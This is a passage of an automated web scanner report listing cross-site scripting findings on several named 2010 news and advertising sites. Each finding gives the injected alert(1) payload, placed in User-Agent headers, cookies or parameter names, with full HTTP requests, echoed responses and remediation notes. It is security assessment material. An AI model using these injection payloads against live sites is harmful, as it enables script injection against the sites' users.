<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)80fa3"-alert(1)-"b6286669c1b"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2804"-alert(1)-"8c9ab16298d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e2804"-alert(1)-"8c9ab16298d Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:18:50 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 214332 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e2804"-alert(1)-"8c9ab16298d"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fa58"-alert(1)-"33573527a90 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1fa58"-alert(1)-"33573527a90 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:02:11 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Last-modified: Sat, 11 Dec 2010 23:02:10 GMT Expires: Sun, 10 Apr 2011 19:02:10 GMT Etag: s200805.p200805 Content-Length: 174695 Cache-control: max-age=10368000, public
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1fa58"-alert(1)-"33573527a90"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31b30"-alert(1)-"e139f47c396 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topics.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)31b30"-alert(1)-"e139f47c396 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:02:32 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Last-modified: Sat, 11 Dec 2010 23:02:31 GMT Expires: Sun, 10 Apr 2011 19:02:31 GMT Etag: s200805.p200805 Content-Length: 177610 Cache-control: max-age=10368000, public
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)31b30"-alert(1)-"e139f47c396"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52b59"-alert(1)-"43e08bcb0f0 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topics.asp?node_id=1341 HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)52b59"-alert(1)-"43e08bcb0f0 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:16:24 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Last-modified: Sat, 11 Dec 2010 23:16:22 GMT Expires: Sun, 10 Apr 2011 19:16:22 GMT Etag: s200805.p200805 Content-Length: 254331 Cache-control: max-age=10368000, public
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)52b59"-alert(1)-"43e08bcb0f0"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94bc6"-alert(1)-"10dc9164079 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webinar_archives.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)94bc6"-alert(1)-"10dc9164079 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:04:07 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 324623 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)94bc6"-alert(1)-"10dc9164079"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4295"-alert(1)-"7040ddc3224 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webinars.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a4295"-alert(1)-"7040ddc3224 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:02:36 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 183275 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a4295"-alert(1)-"7040ddc3224"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c816"-alert(1)-"2696a673d7f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /util/download.jhtml HTTP/1.1 Host: www.ondemanditgovernance.techweb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9c816"-alert(1)-"2696a673d7f Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:02:29 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:02:29 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=RQXR5DBC30VMDQE1GHOSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 7195
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> < ...[SNIP]...
var s_prop1=""; var s_prop2=""; var s_prop3=""; var s_prop4=""; var s_prop5=""; var s_prop6=""; var s_prop7=""; var s_prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9c816"-alert(1)-"2696a673d7f"; var s_prop9=""; var s_prop10=""; var s_prop11=""; var s_prop12=""; var s_prop14=""; var s_prop15=""; var s_prop16=""; var s_prop19="False";
/* E-commerce Variables */ var s_campaign=""; ...[SNIP]...
3.1004. http://analytics.informationweek.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://analytics.informationweek.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c7345--><script>alert(1)</script>b2e8fd9820c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?c7345--><script>alert(1)</script>b2e8fd9820c=1 HTTP/1.1 Host: analytics.informationweek.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_cc=true; s_sq=%5B%5BB%5D%5D; s_lv=1292111917529; s_lv_s=More%20than%207%20days
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... gin?service=http%3A%2F%2Fanalytics.informationweek.com%2F%3Fc7345--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb2e8fd9820c%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/?c7345--><script>alert(1)</script>b2e8fd9820c=1"> ...[SNIP]...
The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 678be<script>alert(1)</script>24c3516d751 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /b/node_rcAll.pli HTTP/1.1 Host: ar.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1678be<script>alert(1)</script>24c3516d751; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Dec 2010 01:21:22 GMT Content-Type: application/x-javascript Connection: close Vary: Accept-Encoding Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 01:21:22 GMT; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 1006
({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "UID": '177862ed-204.0.5.41-1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&', "BMX_3PC": '1678be<script>alert(1)</script>24c3516d751', "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=1292110859', "ar_70821733": 'exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&', "BMX_G": ' ...[SNIP]...
The value of the BMX_BR cookie is copied into the HTML document as plain text between tags. The payload 3102f<script>alert(1)</script>e3adabc011d was submitted in the BMX_BR cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /b/node_rcAll.pli HTTP/1.1 Host: ar.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=12921108593102f<script>alert(1)</script>e3adabc011d;
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Dec 2010 01:21:29 GMT Content-Type: application/x-javascript Connection: close Vary: Accept-Encoding Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 01:21:29 GMT; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 1006
({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "BMX_G": '0', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov ...[SNIP]... -1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&', "BMX_3PC": '1', "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=12921108593102f<script>alert(1)</script>e3adabc011d', "ar_70821733": 'exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&', "ar_p76459327": 'exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec ...[SNIP]...
The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload f03f8<script>alert(1)</script>ece97109cf6 was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /b/node_rcAll.pli HTTP/1.1 Host: ar.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0f03f8<script>alert(1)</script>ece97109cf6; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Dec 2010 01:21:25 GMT Content-Type: application/x-javascript Connection: close Vary: Accept-Encoding Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 01:21:25 GMT; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 1006
({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "BMX_G": '0f03f8<script>alert(1)</script>ece97109cf6', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&', "ar_p72213098": 'exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14 ...[SNIP]...
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 36dc5<script>alert(1)</script>1cef8ae22e9 was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /b/node_rcAll.pli HTTP/1.1 Host: ar.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-128892237236dc5<script>alert(1)</script>1cef8ae22e9; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Dec 2010 01:21:26 GMT Content-Type: application/x-javascript Connection: close Vary: Accept-Encoding Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 01:21:26 GMT; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 1006
